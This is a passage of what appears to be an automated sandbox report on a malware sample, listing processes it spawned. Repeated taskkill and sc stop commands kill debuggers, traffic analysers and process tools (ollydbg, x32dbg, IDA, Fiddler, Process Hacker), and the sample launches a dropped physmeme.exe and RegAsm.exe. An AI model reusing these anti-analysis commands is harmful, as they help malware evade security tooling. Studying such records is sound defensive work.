                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2084 -s 380Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
